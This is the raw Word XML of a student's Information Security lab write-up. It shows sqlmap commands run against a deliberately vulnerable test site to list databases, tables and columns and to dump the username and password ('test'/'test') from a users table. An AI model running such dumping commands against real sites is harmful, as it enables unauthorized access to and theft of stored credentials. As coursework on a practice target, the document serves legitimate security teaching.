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68658" w14:textId="4726ED2D" w:rsidR="00F00084" w:rsidRDefault="00F00084" w:rsidP="00F0008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Muhammad Rabid Shahid 231-523036</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C1D50D" w14:textId="3F3F9727" w:rsidR="00F00084" w:rsidRDefault="00F00084" w:rsidP="00F0008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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00084">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nformation Security Section A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF299AB" w14:textId="464E5B7D" w:rsidR="00E21943" w:rsidRDefault="00F00084" w:rsidP="00F0008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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4718B52F" w14:textId="77777777" w:rsidR="00F00084" w:rsidRDefault="00F00084" w:rsidP="00F00084">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A66D526" w14:textId="64C11FEC" w:rsidR="004D3750" w:rsidRPr="00F00084" w:rsidRDefault="00E21943" w:rsidP="00F00084">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00084">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Steps and commands to conduct the attack</w:t>
      </w:r>
      <w:r w:rsidR="003A7052" w:rsidRPr="00F00084">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72186844" w14:textId="78FE1567" w:rsidR="00641C87" w:rsidRDefault="00641C87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 xml:space="preserve">Copy link of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vulnerable website</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and paste on </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>terminal</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4687F9EB" w14:textId="2098704A" w:rsidR="00E21943" w:rsidRPr="00F00084" w:rsidRDefault="00E21943">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00084">
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00F00084">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/artists.php?artist=2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00084">
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="085B5B98" w14:textId="38386AF2" w:rsidR="00641C87" w:rsidRPr="00E21943" w:rsidRDefault="00641C87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245DF8EC" wp14:editId="5C79D803">
            <wp:extent cx="4166870" cy="8001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14" t="15955" r="5525" b="72520"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4188678" cy="80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80BBF" w14:textId="77777777" w:rsidR="00F00084" w:rsidRDefault="00F00084">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B2FB45" w14:textId="0FF9E0F7" w:rsidR="00641C87" w:rsidRPr="00E21943" w:rsidRDefault="00641C87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 xml:space="preserve">Types of </w:t>
      </w:r>
      <w:r w:rsidR="00E21943" w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>databases</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> available:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676BA093" w14:textId="3730D6AC" w:rsidR="00641C87" w:rsidRPr="00E21943" w:rsidRDefault="00641C87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7565DFBA" wp14:editId="5107E6DF">
            <wp:extent cx="4100732" cy="502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28" t="33672" r="9727" b="59755"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4124201" cy="50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1943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A072A98" w14:textId="77777777" w:rsidR="00F00084" w:rsidRDefault="00F00084">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A86045" w14:textId="3A2C2152" w:rsidR="00641C87" w:rsidRDefault="005066F1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 xml:space="preserve">Selecting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5548A3EA" w14:textId="164E103B" w:rsidR="00E21943" w:rsidRPr="00F00084" w:rsidRDefault="00E21943">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00084">
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00F00084">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/artists.php?artist=2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve">D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00084">
        <w:t>acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve"> --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6559A0" w14:textId="205C3D34" w:rsidR="00F00084" w:rsidRDefault="005066F1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47F664B0" wp14:editId="5EAF730E">
            <wp:extent cx="4419600" cy="1097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6" t="47260" r="6001" b="37917"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4423260" cy="109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A3E69" w14:textId="77777777" w:rsidR="00F00084" w:rsidRDefault="00F00084">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1786487E" w14:textId="77777777" w:rsidR="00F00084" w:rsidRDefault="00F00084">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CCD892E" w14:textId="77777777" w:rsidR="00F00084" w:rsidRDefault="00F00084">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A49DB8" w14:textId="77777777" w:rsidR="00F00084" w:rsidRDefault="00F00084">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2245C719" w14:textId="7414AFAE" w:rsidR="00F00084" w:rsidRDefault="005066F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof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lastRenderedPageBreak/>
        <w:t>Tables in database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A69683E" w14:textId="0DA4BE4C" w:rsidR="00E21943" w:rsidRPr="00E21943" w:rsidRDefault="005066F1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3386B765" wp14:editId="3FE04E95">
            <wp:extent cx="4366260" cy="19141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47" t="28034" r="13718" b="51909"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4396492" cy="192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0886C" w14:textId="48D100BE" w:rsidR="00AC6953" w:rsidRDefault="00AC6953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>Selecting column “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>” from the database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15165A49" w14:textId="5A19335A" w:rsidR="00E21943" w:rsidRPr="00F00084" w:rsidRDefault="00E21943">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00084">
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00F00084">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/artists.php?artist=2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve">D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00084">
        <w:t>acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve"> -T users --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00084">
        <w:t>colums</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="136562DD" w14:textId="13D3E867" w:rsidR="00AC6953" w:rsidRDefault="00AC6953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35B208BA" wp14:editId="40175FBF">
            <wp:extent cx="4593036" cy="1150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9" t="28414" r="6154" b="56765"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4607952" cy="115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76FB0" w14:textId="77777777" w:rsidR="00F00084" w:rsidRPr="00E21943" w:rsidRDefault="00F00084">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C4842DA" w14:textId="32442948" w:rsidR="00AC6953" w:rsidRPr="00E21943" w:rsidRDefault="00AC6953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>Fetching information from “users”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD4C542" w14:textId="7BF08924" w:rsidR="00AC6953" w:rsidRPr="00E21943" w:rsidRDefault="00AC6953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7DB8148E" wp14:editId="66102E5F">
            <wp:extent cx="4023360" cy="279357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77" t="14378" r="5905" b="43631"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4030445" cy="279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804AE" w14:textId="77777777" w:rsidR="00F00084" w:rsidRDefault="00F00084">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55CA300D" w14:textId="3DD49C96" w:rsidR="00AC695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lastRenderedPageBreak/>
        <w:t>Exploiting</w:t>
      </w:r>
      <w:r w:rsidR="00AC6953" w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidR="00AC6953" w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> from database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C9E8F2" w14:textId="742D14F6" w:rsidR="00E21943" w:rsidRPr="00F00084" w:rsidRDefault="00E21943" w:rsidP="00E21943">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00084">
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00F00084">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/artists.php?artist=2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve">D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00084">
        <w:t>acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve"> -T users -C </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00084">
        <w:t>unname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve"> --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F73C1C" w14:textId="77777777" w:rsidR="00E21943" w:rsidRPr="00E21943" w:rsidRDefault="00E21943">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75373121" w14:textId="16F86EDA" w:rsidR="00AC6953" w:rsidRPr="00E21943" w:rsidRDefault="00AC6953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5BFCDEDC" wp14:editId="5B2B65B3">
            <wp:extent cx="4503483" cy="60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57" t="28426" r="5641" b="63511"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4549371" cy="61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8E46" w14:textId="77777777" w:rsidR="00F00084" w:rsidRDefault="00F00084">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="150F927F" w14:textId="77777777" w:rsidR="00F00084" w:rsidRDefault="00F00084">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C15977" w14:textId="3A70D105" w:rsidR="00853B4C" w:rsidRPr="00E2194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 xml:space="preserve">User name </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>found :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> “test”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360557C2" w14:textId="135BA450" w:rsidR="00853B4C" w:rsidRPr="00E2194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26E55ACD" wp14:editId="43237057">
            <wp:extent cx="4282440" cy="190702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3" t="16409" r="6539" b="57507"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4306973" cy="191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A982" w14:textId="77777777" w:rsidR="00F00084" w:rsidRDefault="00F00084">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DBB5ED7" w14:textId="1173D846" w:rsidR="00853B4C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 xml:space="preserve">Exploiting a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">password </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>from database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626F5789" w14:textId="463F9CEB" w:rsidR="00E21943" w:rsidRPr="00F00084" w:rsidRDefault="00E21943">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00084">
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00F00084">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/artists.php?artist=2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve"> -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00084">
        <w:t>acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve"> -T users -C </w:t>
      </w:r>
      <w:r w:rsidR="00F00084" w:rsidRPr="00F00084">
        <w:t>pass</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00084">
        <w:t xml:space="preserve"> --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A483A4" w14:textId="6B9718BD" w:rsidR="00853B4C" w:rsidRPr="00E2194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1DCA2DEA" wp14:editId="0FB34628">
            <wp:extent cx="4091538" cy="6477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3" t="34188" r="6154" b="56431"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4119214" cy="65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3BE1" w14:textId="77777777" w:rsidR="00F00084" w:rsidRDefault="00F00084">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E9CEAF2" w14:textId="32F72806" w:rsidR="00853B4C" w:rsidRPr="00E2194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t>Password found: “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555B8481" w14:textId="77777777" w:rsidR="00F00084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46203EF7" wp14:editId="24CB5F60">
            <wp:extent cx="4060190" cy="1074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85" t="29277" r="5769" b="54800"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4079774" cy="107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E0AF" w14:textId="4C510E70" w:rsidR="00853B4C" w:rsidRDefault="00E21943">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uccessful</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>exploitation</w:t>
      </w:r>
      <w:r w:rsidR="00853B4C" w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00853B4C" w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="429D15D5" wp14:editId="73AF0BAE">
            <wp:extent cx="4209143" cy="3188077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3" r="4630" b="22507"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4226424" cy="3201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3C783" w14:textId="77777777" w:rsidR="00F00084" w:rsidRPr="00E21943" w:rsidRDefault="00F00084">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="474FF483" w14:textId="5C104E5C" w:rsidR="00853B4C" w:rsidRPr="00E21943" w:rsidRDefault="00853B4C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="789B0D43" wp14:editId="6E71A27B">
            <wp:extent cx="4312920" cy="3307080"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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8" r="4643" b="16581"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4336541" cy="332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3B4C" w:rsidRPr="00E21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052"/>
    <w:rsid w:val="003A7052"/>
    <w:rsid w:val="004D3750"/>
    <w:rsid w:val="005066F1"/>
    <w:rsid w:val="00641C87"/>
    <w:rsid w:val="00853B4C"/>
    <w:rsid w:val="00AC6953"/>
    <w:rsid w:val="00E21943"/>
    <w:rsid w:val="00F00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D80A1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{603562FB-0DFC-43A1-A0AA-CB798960E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194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19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19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://testphp.vulnweb.com/artists.php?artist=2" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist=2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://testphp.vulnweb.com/artists.php?artist=2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hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist=2" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist=2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rabid shahid</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>rabid shahid</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-30T16:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-30T17:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>